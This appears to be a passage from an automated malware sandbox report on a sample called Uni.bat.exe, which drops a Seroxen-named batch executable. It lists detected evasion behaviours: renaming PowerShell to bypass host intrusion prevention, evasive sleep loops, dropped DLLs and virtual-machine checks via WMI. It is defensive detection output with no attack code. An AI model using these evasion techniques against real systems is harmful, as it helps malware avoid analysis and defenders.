Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Uni.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Renames powershell.exe to bypass HIPS
Source: C:\Windows\System32\cmd.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Uni.bat.exe TID: 1236 Thread sleep count: 8596 > 30 Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 1992 Thread sleep count: 262 > 30 Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 1992 Thread sleep time: -262000s >= -30000s Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 3496 Thread sleep count: 2183 > 30 Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 3496 Thread sleep time: -218300s >= -30000s Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 1264 Thread sleep count: 2665 > 30 Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 1264 Thread sleep time: -266500s >= -30000s Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 4640 Thread sleep count: 401 > 30
Source: C:\Windows\System32\winlogon.exe TID: 4640 Thread sleep time: -401000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 3208 Thread sleep count: 371 > 30
Source: C:\Windows\System32\lsass.exe TID: 3208 Thread sleep time: -371000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7868 Thread sleep count: 387 > 30
Source: C:\Windows\System32\svchost.exe TID: 7868 Thread sleep time: -387000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 5064 Thread sleep count: 367 > 30
Source: C:\Windows\System32\dwm.exe TID: 5064 Thread sleep time: -367000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2152 Thread sleep count: 243 > 30
Source: C:\Windows\System32\svchost.exe TID: 2152 Thread sleep time: -243000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2640 Thread sleep count: 319 > 30
Source: C:\Windows\System32\svchost.exe TID: 2640 Thread sleep time: -319000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4280 Thread sleep count: 331 > 30
Source: C:\Windows\System32\svchost.exe TID: 4280 Thread sleep time: -331000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 1244 Thread sleep count: 348 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe TID: 1244 Thread sleep time: -348000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1260 Thread sleep count: 345 > 30
Source: C:\Windows\System32\svchost.exe TID: 1260 Thread sleep time: -345000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4656 Thread sleep count: 312 > 30
Source: C:\Windows\System32\svchost.exe TID: 4656 Thread sleep time: -312000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1344 Thread sleep count: 318 > 30
Source: C:\Windows\System32\svchost.exe TID: 1344 Thread sleep time: -318000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7824 Thread sleep count: 321 > 30
Source: C:\Windows\System32\svchost.exe TID: 7824 Thread sleep time: -321000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 8212 Thread sleep count: 318 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe TID: 8212 Thread sleep time: -318000s >= -30000s
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 6124 Thread sleep count: 316 > 30
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe TID: 6124 Thread sleep time: -316000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8400 Thread sleep count: 303 > 30
Source: C:\Windows\System32\svchost.exe TID: 8400 Thread sleep time: -303000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4820 Thread sleep count: 305 > 30
Source: C:\Windows\System32\svchost.exe TID: 4820 Thread sleep time: -305000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2620 Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 2620 Thread sleep time: -306000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7688 Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 7688 Thread sleep time: -300000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4296 Thread sleep count: 301 > 30
Source: C:\Windows\System32\svchost.exe TID: 4296 Thread sleep time: -301000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5296 Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 5296 Thread sleep time: -299000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7348 Thread sleep count: 289 > 30
Source: C:\Windows\System32\svchost.exe TID: 7348 Thread sleep time: -289000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4212 Thread sleep count: 292 > 30
Source: C:\Windows\System32\svchost.exe TID: 4212 Thread sleep time: -292000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2000 Thread sleep count: 279 > 30
Source: C:\Windows\System32\svchost.exe TID: 2000 Thread sleep time: -279000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5596 Thread sleep count: 283 > 30
Source: C:\Windows\System32\svchost.exe TID: 5596 Thread sleep time: -283000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 592 Thread sleep count: 278 > 30
Source: C:\Windows\System32\svchost.exe TID: 592 Thread sleep time: -278000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8276 Thread sleep count: 279 > 30
Source: C:\Windows\System32\svchost.exe TID: 8276 Thread sleep time: -279000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5968 Thread sleep count: 262 > 30
Source: C:\Windows\System32\svchost.exe TID: 5968 Thread sleep time: -262000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7500 Thread sleep count: 267 > 30
Source: C:\Windows\System32\svchost.exe TID: 7500 Thread sleep time: -267000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 7072 Thread sleep count: 267 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 7072 Thread sleep time: -267000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8300 Thread sleep count: 265 > 30
Source: C:\Windows\System32\svchost.exe TID: 8300 Thread sleep time: -265000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe Last function: Thread delayed
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHDCPSvc.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe Last function: Thread delayed
Source: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\IntelCpHeciSvc.exe Last function: Thread delayed
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe Last function: Thread delayed
Source: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxCUIService.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Windows\$sxr-seroxen.bat.exe Dropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe Dropped PE file which has not been started: C:\Windows\$sxr-seroxen\$sxr-nircmd.exe Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe Dropped PE file which has not been started: C:\Windows\System32\vcruntime140_1d.dll Jump to dropped file
Source: C:\Windows\$sxr-seroxen.bat.exe Dropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll Jump to dropped file
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Uni.bat.exe Window / User API: threadDelayed 8596 Jump to behavior
Source: C:\Windows\$sxr-seroxen.bat.exe Window / User API: threadDelayed 7948 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 2183 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 2665 Jump to behavior
Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 401
Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 371
Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 387
Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 367
Found large amount of non-executed APIs
Source: C:\Windows\System32\dllhost.exe API coverage: 6.1 %
Source: C:\Windows\System32\dllhost.exe API coverage: 5.7 %
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Uni.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\$sxr-seroxen.bat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\Uni.bat.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400A9210 GetSystemInfo, 5_2_00000001400A9210
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_00000001400FFC90 FindFirstFileExW,FindNextFileW, 5_2_00000001400FFC90
Source: C:\Windows\System32\dllhost.exe Code function: 11_2_00000001400FFC90 FindFirstFileExW,FindNextFileW, 11_2_00000001400FFC90
Source: svchost.exe, 00000016.00000000.3887735156.0000027F7EC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@Microsoft-Windows-Hyper-V-Netvsc
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: "@Microsoft-Windows-Hyper-V-Guest-Drivers-Vmbus
Source: svchost.exe, 00000016.00000000.3923371178.0000027F7DC40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3825612583.0000027F7DC40000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &@Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
Source: lsass.exe, 0000000E.00000000.3269123828.000002AFF4CA8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000016.00000000.3940274327.0000027F7ECAD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: "@Microsoft-Windows-Hyper-V-NETVSC/Diagnostic
Source: svchost.exe, 00000016.00000000.3940274327.0000027F7ECAD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: .@Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Compute-Adminog.dll
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Guest-Drivers-Dynamic-Memory
Source: svchost.exe, 00000016.00000000.3941612753.0000027F7ED84000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3895310388.0000027F7ED84000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: (@Microsoft-Windows-Hyper-V-Guest-Drivers-Storage-Filter
Source: svchost.exe, 00000016.00000000.3878876111.0000027F7EB69000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $@Microsoft-Windows-Hyper-V-Guest-Drivers/Debug
Source: svchost.exe, 00000016.00000000.3887735156.0000027F7EC8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisorll
Source: lsass.exe, 0000000E.00000000.3266837187.000002AFF4C13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000E.00000000.3226875223.000002AFF4C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.3292570688.0000020F6E813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000000.3304366742.0000020F6E813000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.3637868713.000001488D080000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000000.3676062875.000001488D080000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3923371178.0000027F7DC40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.3825612583.0000027F7DC40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.3998778311.0000023FA562A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.3986098899.0000023FA562A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.4170940274.000002166842B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V 